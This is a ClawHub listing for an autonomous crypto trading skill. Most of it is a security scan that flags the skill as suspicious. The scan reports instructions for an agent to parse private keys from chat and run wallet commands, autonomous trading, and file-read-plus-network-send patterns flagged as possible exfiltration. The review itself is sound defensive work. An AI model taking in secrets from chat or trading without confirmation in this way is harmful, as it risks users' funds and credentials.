ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

[1m-trade] AI Autonomous Trading

v1.1.8

Integrated on-chain operations hub: integrates BlockBeats market intelligence, Hyperliquid DEX trading via `hl1m`, wallet creation and management at https://...

0· 213·0 current·0 all-time
by@eycuit
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
Name/description, required binaries (hl1m, curl, node, openclaw) and the BlockBeats + Hyperliquid environment variables are consistent with a news + trading orchestration skill. Requiring an encrypted private key + password (instead of plaintext) is appropriate for a trading CLI. The only mild oddity is the explicit requirement for the openclaw binary and node even though the skill is instruction-first; node is used by the included auto_check.js, and openclaw is used as the host CLI — this is explainable.
!
Instruction Scope
SKILL.md directs the agent to read/write a local .env, call BlockBeats APIs, and invoke the hl1m CLI. It also instructs the model to parse user messages (including non-English) for a wallet address + proxy private key and, when present, run hl1m init-wallet in a trusted shell. Allowing the model to accept secrets in chat and run local commands based on parsed secrets creates a clear risk of accidental misuse or leakage (misclassification of inputs, forwarding of pasted secrets, or running commands from messages that were not intended as 'voluntary' secret submission). There is also a slight contradiction: the top-level SKILL.md says "supports fully autonomous AI trading" while some agent workflows (e.g., Trend Trader) say "Do not execute trades automatically; require final user confirmation." This gives the agent discretionary power that should be explicitly constrained.
Install Mechanism
The root package is instruction-only and includes a small Node preflight script (auto_check.js) — low risk. The dex sub-skill recommends installing a Python package via pipx (pipx install 1m-trade). Installing third-party packages from PyPI is a normal but non-trivial supply-chain risk: you should review the 1m-trade package source and ownership before installing. No direct downloads from obscure URLs are used.
Credentials
The environment variables requested (BLOCKBEATS_API_KEY, HYPERLIQUID_PRIVATE_KEY_ENC, HYPERLIQUID_PK_ENC_PASSWORD, HYPERLIQUID_WALLET_ADDRESS) map to the stated purposes (market data and trading). Requiring an encrypted private key + password rather than plaintext is a reasonable protection. The skill writes/reads a .env under ~/.openclaw/.1m-trade/, which is a local file that may be accessible to other processes — users should ensure appropriate filesystem permissions. No unrelated credentials are requested.
Persistence & Privilege
always:false (no forced global inclusion) and model invocation is enabled (normal). The skill includes pre-built agents that describe periodic/automated workflows (e.g., alerts every 5 minutes). Combined with permission to run hl1m, this means an agent could autonomously place trades if configured that way — this is powerful but expected for trading automation; however you should explicitly control whether the agent may act without explicit user confirmation.
What to consider before installing
This skill appears to be a legitimate trading/news orchestrator, but take these precautions before installing or using it: - Do not paste private keys or API keys into chat. Prefer running hl1m init-wallet locally on your machine rather than pasting secrets to the assistant. The skill instructs the model how to parse secrets from messages — that behavior is risky if you accidentally send secrets or if the model mis-parses other text. - Inspect the pipx package (1m-trade) before installing it: confirm the package owner, review its source repository, and test it in a controlled environment (container or VM) and on testnet first. - Store the .env under a directory with restricted permissions (chmod 600) and consider using a system secret store instead of plaintext files if possible. Verify who/what on the host can read ~/.openclaw/.1m-trade/.env. - Restrict autonomous actions: if you will use this skill, prefer configurations that require explicit user confirmation before placing real trades. Disable or tightly constrain any scheduled/automatic agents until you’ve validated flows on small test amounts. - Verify provenance: the skill's source/homepage are missing/unknown. Confirm the author and repository before giving it access to your trading credentials or running external installs. If you want, I can: (a) list concrete checks to run on the 1m-trade PyPI package and its repository, (b) produce a safe checklist for initializing the CLI with a test proxy key on testnet, or (c) suggest prompts/policies to force explicit confirmation before any trade command is executed.
auto_check.js:64
Shell command execution detected (child_process).
auto_check.js:19
Environment variable access combined with network send.
!
auto_check.js:105
File read combined with network send (possible exfiltration).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.

Like a lobster shell, security has layers — review code before you run it.

latestvk97602233c1ttfw28w6ms9bjzs83wrjj

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

🚀 Clawdis
OSmacOS · Linux · Windows
Binscurl, node, hl1m, openclaw
EnvBLOCKBEATS_API_KEY, HYPERLIQUID_PRIVATE_KEY_ENC, HYPERLIQUID_PK_ENC_PASSWORD, HYPERLIQUID_WALLET_ADDRESS

Comments